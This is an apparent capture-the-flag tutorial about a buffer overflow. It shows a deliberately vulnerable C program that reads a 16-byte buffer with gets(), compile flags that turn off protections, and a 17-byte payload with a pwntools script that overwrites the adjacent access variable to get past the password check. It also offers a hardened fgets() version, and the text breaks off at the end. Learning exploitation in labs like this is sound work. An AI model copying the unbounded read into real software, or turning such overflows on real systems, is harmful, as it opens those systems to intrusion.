08/15/2023
This is an entirely custom project that I am extremely proud of. It works by overwriting variables on the stack in order to bypass comparisons, so that you can grab the flag without even having the right password.

Can you find the password?

How can you get the flag without using the correct password?
```c
#include <stdio.h>
#include <string.h>

const char* hacked()
{
    const char* local_flag = "XYC{H0wD1d1G3tH3r3?!}";
    printf("This is a secret function.\n");
    printf("Access level 0 is required. All attempts to access will be logged.\n");
    printf("Oh yeah, here's your flag: %s\n", local_flag);
    return local_flag;
}

/* The flag is also a global, so main() can print it whether or not hacked() ran. */
char * flag = "XYC{H0wD1d1G3tH3r3?!}";

int main()
{
    char code[16];      /* 16-byte input buffer, adjacent to access on the stack */
    int access = 0;     /* the variable the overflow clobbers */
    printf("Please enter the secret code: \n");
    gets(code);         /* unbounded read: the intentional vulnerability */
    fflush(stdout);
    if(strcmp(code, "1337") == 0)
    {
        flag = hacked();
        access = 1;
    }
    else
    {
        printf("Access denied, silent alarm has been triggered!\n");
    }
    if(access)          /* any non-zero value passes, not just 1 */
    {
        printf("Authentication successful as root (access level=%d) \n", access);
        printf("You are root, granting access... \nAccess granted, welcome root.\n");
        printf("Wow, you realized we could overflow the buffer and you could still get the flag? Nice.\nHere's your flag: %s", flag);
    }
    else
    {
        printf("Authentication failed as root (access level=%d)\n", access);
    }
    return 0;
}
```
Compile:

```shell
gcc 01.c -o 01 -m32 -fno-stack-protector -z execstack -no-pie -g
```
We can see that we have a `hacked()` function which contains our flag. Notice that it returns `local_flag`.

We can also see that our flag is set as a global so it can be accessed through `main()` and passed throughout the program.

Also, be conscious of the dangerous `gets()` call again; we remember why it is dangerous from our last example in 00.

The `strcmp()` compares our input, read into the 16-byte buffer `code`, against the correct input "1337" so that we can access our secret function. If we input the password correctly, we are granted access to the secret function. If not, we trigger the alarm.
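As an added example (not part of the original challenge code), here is the same read-and-compare path hardened: `gets()` is replaced by a bounded `fgets()` reader that refuses any line longer than the 16-byte buffer, so `access` can only ever be set by the `strcmp()`. The `authenticate_line()` helper and `tmpfile()` exist only to feed constructed input lines to it.

```c
#include <stdio.h>
#include <string.h>

/* Bounded replacement for gets(): reads at most len-1 bytes from in and
 * strips the newline. Returns 1 on a complete line, 0 on EOF or when the
 * line did not fit (the excess is drained, never written past the buffer). */
int read_code(char *buf, size_t len, FILE *in)
{
    if (fgets(buf, (int)len, in) == NULL)
        return 0;
    char *nl = strchr(buf, '\n');
    if (nl != NULL) {
        *nl = '\0';
        return 1;
    }
    int c = getc(in);            /* no newline in buf: peek at what follows */
    if (c == '\n' || c == EOF)
        return 1;                /* the line filled the buffer exactly */
    while (c != EOF && c != '\n')
        c = getc(in);            /* too long: drain the rest of the line */
    buf[0] = '\0';
    return 0;
}

/* Same layout as the challenge (16-byte code beside access), but access
 * can now only change through the compare. Returns the access level. */
int authenticate(FILE *in)
{
    char code[16];
    int access = 0;
    if (!read_code(code, sizeof code, in))
        fprintf(stderr, "Input rejected: empty or longer than %zu bytes\n", sizeof code - 1);
    else if (strcmp(code, "1337") == 0)
        access = 1;
    return access;
}

/* Demo helper: run one constructed input line through authenticate(). */
int authenticate_line(const char *line)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return -1;
    fputs(line, f);
    rewind(f);
    int level = authenticate(f);
    fclose(f);
    return level;
}
```

With this reader the 17 x 'A' payload used below is rejected before the compare, while "1337" still yields access level 1.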
Generate the payload with python2:

```shell
python2 -c 'print "A" * 17' > payload
```

Exploit:

```shell
./01 < payload
```
exploit.py:

```python
from pwn import *

context.log_level = 'debug'

# Establish the connection to the program
p = process('./01')  # Change this to the actual path of the '01' program

# Wait for the ':' prompt
p.recvuntil(b':')

# Send 17 bytes of 'A' characters: they spill past code[16] into the
# neighbouring stack variables
payload = b'A' * 17
p.sendline(payload)

# Print the program's output
print(p.recvall().decode())

# Close the connection
p.close()
```
We can see our payload of A's overwriting the variables on the stack, so we bypass the comparisons/checks and get straight to the flag that `hacked()` would have handed us.

We never input the correct password of "1337":